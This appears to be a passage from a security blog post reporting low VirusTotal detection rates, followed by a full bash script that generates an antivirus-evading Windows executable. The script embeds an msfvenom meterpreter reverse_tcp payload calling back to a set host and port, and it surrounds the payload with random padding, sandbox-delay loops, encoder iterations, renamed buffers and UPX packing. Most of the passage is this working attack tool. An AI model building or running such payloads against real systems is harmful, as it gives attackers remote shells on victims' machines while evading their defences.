With these modifications the detection ratio on virustotal is 3/56 as shown below in the screenshot and 2 of those detections were because the sample was packed. Again this is to show anti-virus is good to have but not efficient for specific malware.
Below is a larger sample that was run against virustotal. The randomness setting in the script was set to over 2,500 and the packed executable was detected by 1/56 AV's on virustotal. The description of a Trojan.Win32.Diple is that is connects back to a specific port. In reality no AV that scanned it actually caught this sample.
#!/bin/bash
# This program compiles a C program with a meterpreter reverse_tcp payload in it that can then be executed on a windows host
# The program is setup to create a C program after it is compiled that will bypass most AV's
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
#
# v5 - Changed the random character generator in the generatePadding() function to speed it up
# v5 - Added the use of UPX at the end to pack the executable
#
# Below are the only parameters you should have to change
payload="windows/meterpreter/reverse_tcp"
payloadLHOST="192.168.242.1"
payloadLPORT="3389"
msfvenomBadChars="\x00\xff"
msfvenomEncoder="x86/shikata_ga_nai"
msfvenomIterations="3" # Recommended value: 3
randomness=37 # The higher the randomness the more padding is added to the c program increasing the size of the executable
delayRandomness=32676 # The higher the delay the longer it will take to execute the payload, may increase your chances of escaping a sandbox
currentDir=`pwd`
outputDir="${currentDir}/output/"
outputExe="${outputDir}prog.exe" # You can change the name of the executable on this line
outputUPX="${outputDir}prog-upx.exe" # You can change the name of the executable on this line
cProg="${currentDir}/prog.c"
cProgTemp="${currentDir}/prog.c.temp"
# Create some padding to be compiled in the C program this adds randomness to the binary
function old_generatePadding {
counter=0
randomNumber=$((RANDOM%${randomness}+7))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%5+12))
randomPaddingSize=$((RANDOM%1024+2048))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
randomPadding=`cat /dev/urandom | tr -dc '_a-zA-Z0-9' | head -c ${randomPaddingSize}`
echo "unsigned char ${randomCharname}[]=\"$randomPadding\";" >> $cProg
let counter=counter+1
done
}
function generatePadding {
paddingArray=(0 1 2 3 4 5 6 7 8 9 a b c d e f)
counter=0
randomNumber=$((RANDOM%${randomness}+23))
while [ $counter -lt $randomNumber ]; do
echo "" >> $cProg
randomCharnameSize=$((RANDOM%10+7))
randomCharname=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomCharnameSize}`
echo "unsigned char ${randomCharname}[]=" >> $cProg
randomLines=$((RANDOM%20+13))
for (( c=1; c<=$randomLines; c++ ))
do
randomString="\""
randomLength=$((RANDOM%11+7))
for (( d=1; d<=$randomLength; d++ ))
do
randomChar1=${paddingArray[$((RANDOM%15))]}
randomChar2=${paddingArray[$((RANDOM%15))]}
randomPadding=$randomChar1$randomChar2
randomString="$randomString\\x$randomPadding"
done
randomString="$randomString\""
if [ $c -eq ${randomLines} ]; then
echo "$randomString;" >> $cProg
else
echo $randomString >> $cProg
fi
done
let counter=counter+1
done
}
# Check to see the output directory exists
if [[ ! -d "$outputDir" ]]; then
mkdir $outputDir
fi
echo ""
echo "You may see multiple errors until the executable is compiled successfully."
echo ""
if [[ $msfvenomIterations > 3 ]]; then
echo "Most of the errors are due to the msfvenom iterations value is set too high."
echo "Recommended value: msfvenomIterations=3"
fi
echo ""
# Check to see if the executable was previously created
if [[ -f "$outputExe" ]]; then
echo "Remove the executable at ${outputExe} to recreate it."
echo ""
fi
# Warn if the gcc-mingw32 package is not located here /usr/bin/i586-mingw32msvc-gcc
# You may need to install the following on Kali Linux to compile the C to an Exe - "apt-get install gcc-mingw32"
if [[ ! -f /usr/bin/i586-mingw32msvc-gcc ]]; then
echo "The gcc-mingw32 package appears to not be installed because /usr/bin/i586-mingw32msvc-gcc is missing."
echo "Run 'apt-get install gcc-mingw32' to install it on Kali linux"
echo ""
fi
# Until the prog.exe is compiled successfully loop until it is
while [[ ! -f "$outputExe" ]]; do
# Delete the c program and recreate it
rm -f $cProg
generatePadding
echo "" >> $cProg
echo "int main(void)" >> $cProg
echo "{" >> $cProg
# Introduce a couple of processing loops for a delay
echo "" >> $cProg
echo "int zewd5 = 1, rqs3 = 1;" >> $cProg
echo "for ( zewd5 = 1 ; zewd5 <= ${delayRandomness} ; zewd5++ )" >> $cProg
echo " for ( rqs3 = 1 ; rqs3 <= ${delayRandomness} ; rqs3++ )" >> $cProg
echo " {}" >> $cProg
echo "" >> $cProg
generatePadding
echo "" >> $cProg
msfvenom -p ${payload} LHOST=${payloadLHOST} LPORT=${payloadLPORT} -b ${msfvenomBadChars} -e ${msfvenomEncoder} -i ${msfvenomIterations} -f c >> $cProg
generatePadding
echo "" >> $cProg
echo "((void (*)())buf)();" >> $cProg
echo "" >> $cProg
generatePadding
echo "" >> $cProg
echo "}" >> $cProg
randomBufNameSize=$((RANDOM%10+23))
randomBufName=`cat /dev/urandom | tr -dc 'a-zA-Z' | head -c ${randomBufNameSize}`
cat $cProg | sed "s/buf/${randomBufName}/g" > $cProgTemp
mv -f $cProgTemp $cProg
# To install the following program on Kali Linux - "apt-get install gcc-mingw32"
i586-mingw32msvc-gcc -o $outputExe $cProg
done
# Use UPX to create a second executable, testing...
upx -q --ultra-brute -o $outputUPX $outputExe
No comments:
Post a Comment